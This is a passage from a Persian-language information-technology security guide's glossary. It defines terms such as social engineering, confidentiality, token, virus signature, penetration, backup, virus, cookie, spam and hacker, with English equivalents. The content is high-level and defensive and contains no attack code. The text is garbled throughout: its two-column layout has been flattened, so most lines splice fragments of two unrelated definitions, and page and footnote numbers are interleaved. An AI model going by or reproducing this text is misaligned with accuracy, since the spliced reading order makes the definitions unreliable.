‫ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﺩﻫﺪ‪.‬‬
‫‪٤٦٣‬‬
‫ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ‬ ‫‪٤٥٧‬‬
‫ﻣﺤﺮﻣﺎﻧﮕﻲ‬
‫ﺣﻤﻠﻪﺍﻱ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﻓﺮﻳﺐ ﻛﺎﺭﺑﺮﺍﻥ ﻳـﺎ ﺭﺍﻫﺒـﺮﺍﻥ ﺍﺩﺍﺭﺓ ﻫـﺪﻑ‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺣـﺴﺎﺱ ﺗﻨﻬـﺎ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺍﻓـﺮﺍﺩ ﻳـﺎ‬
‫ﻻ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲ ﮔﻴﺮﺩ‪ .‬ﺣﻤﻼﺕ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻣﻌﻤـﻮ ﹰ‬ ‫ﮔﺮﻭﻫﻬﺎﻱ ﺧﺎﺻﻲ )ﺍﺯ ﺩﺍﺧﻞ ﻳﺎ ﺧﺎﺭﺝ ﺳـﺎﺯﻣﺎﻥ( ﻗـﺮﺍﺭ ﺩﺍﺭﻧـﺪ‪ .‬ﻣﻴـﺰﺍﻥ‬
‫ﺗﻠﻔﻦ ﺯﺩﻥ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺗﻈﺎﻫﺮ ﻣﻬﺎﺟﻢ ﺑـﻪ ﺍﻳﻨﻜـﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ‬ ‫ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ ﺑﺴﺘﻪ ﺑﻪ ﺩﺭﺟﺔ ﺣﻔﺎﻇﺘﻲ ﺍﺳﺖ ﻛﻪ ﺳﺎﺯﻣﺎﻥ‬
‫ﻣﺠﺎﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺖ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ‪.‬‬ ‫ﺑﺮﺍﻱ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬

‫ﻣﺤﻴﻂ‬
‫ﻣﺠﻤﻮﻋﺔ ﻣﻮﻗﻌﻴﺘﻬﺎ‪ ،‬ﺷﺮﺍﻳﻂ‪ ،‬ﻭ ﻋﻮﺍﻣﻞ ﺑﻴﺮﻭﻧـﻲ ﻛـﻪ ﺑـﺮ ﺗﻮﺳـﻌﻪ‪،‬‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﻋﻤﻠﻜﺮﺩ‪ ،‬ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﻧﺪ‪.‬‬

‫‪458 Risk‬‬
‫‪459 Countermeasure‬‬
‫‪460 Audit‬‬ ‫‪453 Access Control‬‬
‫‪461 Security Audit‬‬ ‫‪454 Spoof‬‬
‫‪462 Intruder‬‬ ‫‪455 Domain Name Server Spoofing‬‬
‫‪463 Social Engineering‬‬ ‫‪456 Permissions‬‬
‫‪457 Confidentiality‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٦٤‬‬

‫‪٤٦٨‬‬ ‫‪٤٦٤‬‬
‫ﻧﺸﺎﻥ‬ ‫ﺍﻧﻌﻄﺎﻑ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﻄﺎ‬
‫ﻋﺎﻣﻞ ﺍﺻﻠﻲ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻃﻮﻝ ﻓﺮﺁﻳﻨﺪ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﺎﺭﺑﺮﺍﻥ‪.‬‬ ‫ﻳﻚ ﺷﻴﻮﺓ ﻃﺮﺍﺣﻲ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑﺮﻭﺯ ﺧﻄﺎﻫﺎﻱ ﻓـﺮﺩﻱ ﺑـﺎ ﺍﻳﺠـﺎﺩ‬
‫ﻧﺸﺎﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻛﻮﭼﻜﻲ ﻣﺜﻞ ﺗﺮﺍﺷﻪﻫﺎﻱ ﺟﻴﺒﻲ ﻭ‬ ‫ﻋﻨﺎﺻﺮ ﺗﻜﺮﺍﺭﻱ ﺩﺭ ﺳﻴﺴﺘﻢ‪ ،‬ﻋﻤﻠﻜﺮﺩ ﻣﺪﺍﻭﻡ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗـﻀﻤﻴﻦ‬
‫ﻳﺎ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﻣﻲﻛﻨﺪ‪.‬‬

‫‪٤٦٩‬‬ ‫‪٤٦٥‬‬
‫ﻧﺸﺎﻥ ﻭﻳﺮﻭﺱ‬ ‫ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﻋﻼﺋﻢ ﻣﺸﺨﺼﺔ ﻳﻚ ﻭﻳﺮﻭﺱ ﻛﻪ ﺗﻮﺳﻂ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ‬ ‫ﻳﻚ ﻧﺎﻡ ﻭ ﻳﻚ ﺭﻣﺰ ﻣﺤﺮﻣﺎﻧـﻪ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺑـﻪ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫ﺍﻣﻨﻴﺘﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﺭﺩﻳﺎﺑﻲ ﻭ ﺑﺎ ﺁﻧﻬـﺎ ﻣﺒـﺎﺭﺯﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﻓﻌـﺎﻟﺘﺮﻳﻦ‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻌﺮﻓﻲ ﻣـﻲﻛﻨـﺪ‪ .‬ﻳـﻚ ﺭﻭﺵ ﺳـﻨﺘﻲ ﻭ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺍﺯ ﺟﻤﻠـﻪ ‪) Norton ،McAfee‬ﺧـﺼﻮﺻﹰﺎ‬ ‫ﺟﺎ ﺍﻓﺘﺎﺩﻩ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ‪.‬‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﻧﻬﺎ ﺷﺎﻣﻞ ﺿﺪﻭﻳﺮﻭﺱ ﻭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ( ﻭ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ‬
‫‪٤٦٦‬‬
‫ﻛﻪ ﺩﺭ ﺟﻬﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺶ ﺗـﻼﺵ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ‬
‫ﻣﻲ ﻛﻨﺪ‪ ،‬ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻭﺻﻠﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬ ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﺘﻦ ﺁﻧﻬﺎ ﺗﺤﺖ ﺷﺮﺍﻳﻄﻲ ﺗﻮﺯﻳـﻊ ﻣـﻲﺷـﻮﺩ ﻛـﻪ‬
‫ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪.‬‬ ‫ﻫﺮﮔﻮﻧﻪ ﺍﺻﻼﺡ ﻭ ﺗﻮﺯﻳﻊ ﺭﺍﻳﮕﺎﻥ ﺁﻥ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ‬
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺍﺳﺖ‪ ،‬ﺍﻓﺮﺍﺩ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑﺒﻴﻨﻨـﺪ ﻛـﻪ ﺁﻥ‬
‫‪٤٧٠‬‬
‫ﻧﻔﻮﺫ‬ ‫ﺑﺮﻧﺎﻣﻪ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻭ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺁﻧﺮﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻨـﺪ‪.‬‬
‫ﺩﺳﺘﺮﺳﻲ ﻣﻮﻓﻖ‪ ،‬ﻗﺎﺑﻞ ﺗﻜﺮﺍﺭ‪ ،‬ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﻣﻨﺎﺑﻊ ﺣﻔﺎﻇﺖﺷـﺪﺓ‬ ‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻦﺑـﺎﺯ ﻏﺎﻟﺒـﹰﺎ ﺳـﺎﻳﺮ ﺑﺮﻧﺎﻣـﻪﻧﻮﻳـﺴﺎﻥ ﺭﺍ‬
‫ﺳﻴﺴﺘﻢ‪.‬‬ ‫ﺑﺮﺍﻱ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺗﻮﺳﻌﻪﻫﺎﻱ ﺑﻌﺪﻱ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﺸﻮﻳﻖ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﻫﻤﭽﻨﻴﻦ ﺷﺎﻣﻞ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ‬
‫‪٤٧١‬‬
‫ﻧﻘﻄﺔ ﺗﻤﺎﺱ )‪(POC‬‬ ‫ﺑﻄﻮﺭ ﺭﺍﻳﮕﺎﻥ ﻋﺮﺿﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻦﺑـﺎﺯ‬
‫ﺷﺨﺺ ﻳﺎ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﺑﻼﻓﺎﺻـﻠﻪ‬ ‫‪ -‬ﭼﻪ ﻓﺮﻭﺷﻲ ﻭ ﭼـﻪ ﺭﺍﻳﮕـﺎﻥ ‪ -‬ﻗﺎﺑﻠﻴﺘﻬـﺎﻳﻲ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺷـﺒﻴﻪ‬
‫ﺑﺎﻳﺪ ﮔﺰﺍﺭﺵ ﺭﺧﻨﻪﻫﺎ ﻳﺎ ﻣﻮﺍﺭﺩ ﻣﺸﻜﻮﻙ ﺭﺍ ﺑﻪ ﺁﻧﻬﺎ ﺑﺪﻫﻨﺪ‪ .‬ﻧﻘﻄـﺔ‬ ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺍﺳﺖ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺰﻳﻨـﺔ ﺍﻧـﺪﻛﻲ ﻧﻴـﺰ‬
‫ﺍﺗﺼﺎﻝ ﻣﻌﺎﺩﻝ ﺧﻂ ﺍﻇﻄـﺮﺍﺭﻱ ‪ ۹۱۱‬ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ‬ ‫ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ‪ .‬ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣــﺘﻦﺑــﺎﺯ ﺗﺤــﺖ‬
‫ﺍﺳﺖ‪.‬‬ ‫ﻣﻮﺍﻓﻘﺘﻨﺎﻣــﻪﻫــﺎﻱ ﻣﺨــﺼﻮﺻﻲ ﺩﺭ ﻗــﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ‬
‫‪٤٧٢‬‬ ‫ﺍﻧﺤﺼﺎﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺛﺒﺘﻬﺎ‬
‫ﭘﺎﻳﺎﮔﺎﻫﻬــﺎﻱ ‪ www.opensource.org‬ﻭ ‪www.fsf.org‬‬
‫ﺍﻳﻨﻜﻪ ﭼﻪ ﻣﺪﺕﺯﻣﺎﻧﻲ ﺍﺯ ﺛﺒﺘﻬﺎ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺭﺟﻮﻉ ﻛﻨﻴﺪ‪.‬‬
‫‪٤٧٣‬‬
‫ﻭﺍﺳﻂ ﻛﺎﺭﺑﺮﻱ‬ ‫‪٤٦٧‬‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ‬
‫ﺁﻥ ﻗﺴﻤﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﺁﻥ‬
‫ﺭﻭﻧﺪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ ﺭﻭﻱ‬
‫ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ‪ .‬ﻭﺍﺳﻄﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺼﻮﺭﺕ ﻣﺘﻨـﻲ‬
‫ﺭﺍﻳﺎﻧﻪ ﻭ ﻳﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺫﺧﻴﺮﻩﺳـﺎﺯﻱ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺑﺎﺷﻨﺪ‪ ،‬ﻣﺜﻞ ﺁﻧﭽﻪ ﺩﺭ ‪ DOS‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻭ ﻳﺎ ﮔﺮﺍﻓﻴﻜـﻲ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﻣﺠﺰﺍ ﺑﺎﺷﻨﺪ‪ .‬ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨـﺪ ﻫﻨﮕـﺎﻡ‬
‫ﻣﺜﻞ ﻭﺍﺳﻄﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ‪.Microsoft Windows‬‬
‫ﺧﺮﺍﺑﻲ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺑﺪﻻﻳﻞ ﻣﺨﺘﻠﻒ)ﺍﺯ ﺣﺬﻑ ﺗﺼﺎﺩﻓﻲ ﺩﺍﺩﻩﻫـﺎ‬
‫ﮔﺮﻓﺘﻪ ﺗﺎ ﺁﺳﻴﺐ ﻓﻴﺰﻳﻜﻲ ﻭ ﻳﺎ ﺩﺯﺩﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ(‪ ،‬ﻫﻤﭽﻨﺎﻥ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺍﺩﻩﻫـﺎ‬
‫ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫‪468 Token‬‬
‫‪469 Virus Signature‬‬
‫‪470 Penetration‬‬ ‫‪464 Fault Tolerant‬‬
‫‪471 Point of Contact‬‬ ‫‪465 Username / Password‬‬
‫‪472 Log Retention‬‬ ‫‪466 Open-Source Software‬‬
‫‪473 User Interface‬‬ ‫‪467 Backup‬‬
‫‪٤٦٥‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪٤٧٤‬‬
‫ﺩﺭ ﻣﻮﺭﺩ ‪ IEEE‬ﻭ ﺟﺎﻣﻌﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ‬ ‫ﻭﻳﺮﻭﺱ‬
‫ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬ ‫ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺩﺍﺧﻞ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺎﺳﺎﺯﻱ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ‪ ،‬ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﺔ ﺁﻟـﻮﺩﻩ ﻫـﻢ ﻓﻌـﺎﻝ‬
‫‪http://standard.ieee.org‬‬
‫‪http://www.computer.org‬‬ ‫ﻣﻲﺷﻮﺩ‪ .‬ﻫﻤﻴﻨﻜﻪ ﻳﻚ ﻭﻳﺮﻭﺱ ﻓﻌﺎﻝ ﺷﺪ‪ ،‬ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺧـﻮﺩ‬
‫ﺭﺍ ﺗﻜﺜﻴﺮ ﻛﻨﺪ‪ ،‬ﭘﻴﺎﻡ ﺑﻔﺮﺳﺘﺪ‪ ،‬ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺗﺨﺮﻳـﺐ ﻛﻨـﺪ‪ ،‬ﻭ ﻛـﺎﺭﺁﻳﻲ‬
‫‪Cookie‬‬
‫ﺳﻴﺴﺘﻢ ﺭﺍ ﭘﺎﻳﻴﻦ ﺑﻴﺎﻭﺭﺩ‪.‬‬
‫ﻳﻚ ﻓﺎﻳـﻞ ﻛـﻪ ﺑـﻪ ﺩﺭﺧﻮﺍﺳـﺖ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ‬
‫ﺩﻳﺴﻚ ﺳـﺨﺖ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﻧﻮﺷـﺘﻪ ﻭ ﻳـﺎ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺧﻮﺍﻧـﺪﻩ‬ ‫‪٤٧٥‬‬
‫ﻫﺮﺯﻧﺎﻣﻪ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﺎﻳﻞ ﻧﻮﺷﺘﻪ ﺷـﻮﺩ ﻭ‬
‫ﻋﺒــﺎﺭﺕ ﺍﺳــﺖ ﺍﺯ ﻧﺎﻣــﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺩﺭﺧﻮﺍﺳــﺖﻧــﺸﺪﻩ‪،‬‬
‫ﻼ ﺍﮔـﺮ ﺑـﻪ‬
‫ﺩﺭ ﺩﻓﻌﺎﺕ ﺑﻌﺪ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻧﺮﺍ ﻣـﻲﺧﻮﺍﻧـﺪ‪ .‬ﻣـﺜ ﹰ‬
‫ﻧﺎﺧﻮﺍﺳﺘﻪ‪ ،‬ﻧﺎﻣﺮﺑﻮﻁ‪ ،‬ﻭ ﻳﺎ ﻧﺎﻣﻨﺎﺳﺐ ؛ ﺧﺼﻮﺻﹰﺎ ﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻭ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺑﺪﻫﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻛﻪ‬
‫ﺗﺒﻠﻴﻐﺎﺗﻲ ﺩﺭ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩ ﺍﺳﺖ‪.‬‬
‫ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺩﻳﺴﻚ ﺷﻤﺎ ﻧﻮﺷﺘﻪ ﺷﻮﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺩﻭﺑﺎﺭﻩ ﺑـﻪ‬
‫ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌﻪ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺁﻥ ﭘﺎﻳﮕﺎﻩ ‪ cookie‬ﻣﺮﺑﻮﻃﻪ ﺭﺍ‬ ‫‪٤٧٦‬‬
‫ﻫﺰﻳﻨﺔ ﻛﻞ ﻣﺎﻟﻜﻴﺖ )‪(TCO‬‬
‫ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﻚ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻣﻲﺧﻮﺍﻧﺪ ﻭ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛـﻪ ﻧـﺎﻡ‬ ‫ﻣﺪﻟﻲ ﻛﻪ ﺑﻪ ﻣﺘﺨﺼـﺼﺎﻥ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺩﺭﻙ ﻭ ﺍﺩﺍﺭﺓ‬
‫ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎ ﭼﻪ ﺑﻮﺩﻩ ﺍﺳﺖ‪Cookie .‬ﻫﺎ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺳـﺎﺑﻘﻪﺍﻱ‬ ‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﻣﺴﺘﻘﻴﻢ ﻭ ﻏﻴﺮﻣﺴﺘﻘﻴﻤﻲ ﻛﻪ ﺑﺎ ﻛﺴﺐ‪ ،‬ﻧﮕﻬـﺪﺍﺭﻱ‪ ،‬ﻭ‬
‫ﺍﺯ ﻋﺎﺩﺗﻬﺎﻱ ﮔﺮﺩﺵ ﺩﺭ ﻭﺏ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺩﺭ ﺑﻌـﻀﻲ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﺎﺭﺑﺮﺩﻱ ﻳﺎ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑـﻪ ﺑـﺎﺭ ﻣـﻲﺁﻳـﺪ‬
‫ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻧﻘﺾ ﻛﻨﻨﺪ‪.‬‬ ‫ﻻ ﺷـﺎﻣﻞ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺁﻣـﻮﺯﺵ‪،‬‬ ‫ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ TCO .‬ﻣﻌﻤـﻮ ﹰ‬
‫‪٤٨٠‬‬
‫ﺍﺭﺗﻘﺎﻫﺎ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻫﺰﻳﻨﺔ ﺍﺻﻠﻲ ﺳﻔﺎﺭﺵ ﺍﻭﻟﻴﻪ ﻧﻴﺰ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪IETF‬‬
‫ﻳﻚ ﺍﻧﺠﻤـﻦ ﻋﻤـﻮﻣﻲ ﻛـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ ﺗـﺪﻭﻳﻦ ﻣـﻲﻛﻨـﺪ ﻭ‬ ‫‪٤٧٧‬‬
‫ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺩﻩﻫﺎ‬
‫ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺭﻭﺯﻣﺮﺓ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺭﻓﻊ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﺍﺩﻩﻫﺎﻱ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻣﻌـﺮﺽ ﺗﻐﻴﻴـﺮ ﻳـﺎ‬
‫ﺗﺨﺮﻳﺐ ﺗﺼﺎﺩﻓﻲ ﻳـﺎ ﺗﻌﻤـﺪﻱ )ﺩﺭﻧﺘﻴﺠـﺔ ﺍﻋﻤـﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧـﻪ( ﻗـﺮﺍﺭ‬
‫‪Hack‬‬
‫ﺩﺭ ﻛﻞ ﺑﻪ ﻣﻌﻨﺎﻱ ﻧﻮﺷﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﺩﺭ ﻣﺘـﻮﻥ‬ ‫ﻧﮕﺮﻓﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﻻ ﺑﺮﺍﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺳﻴـﺴﺘﻢ‬ ‫ﺍﻣﻨﻴﺘﻲ ﻣﻌﻤﻮ ﹰ‬ ‫‪802.11‬‬
‫ﺟﻬﺖ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬ ‫ﻣﺆﺳﺴﻪ‬ ‫‪ 802.11‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﺔ‬
‫ﻣﻬﻨﺪﺳـﺎﻥ ﺑـﺮﻕ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴـﻚ )‪ ٤٧٨(IEEE‬ﺑـﺮﺍﻱ ﺷـﺒﻜﻪﻫــﺎﻱ‬
‫‪Hacker‬‬
‫ﺷﺨﺼﻲ ﻛﻪ ﻋﻼﻗﻤﻨﺪ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ ﻭ ﺍﺯ ﻛﺴﺐ ﺗﺠﺮﺑـﻪ ﺑـﺎ ﺁﻥ‬ ‫ﺑﻲ ﺳﻴﻢ ﻣﺤﻠﻲ )‪ ٤٧٩(WLANs‬ﺍﺳﺖ‪ IEEE .‬ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛـﻪ‬
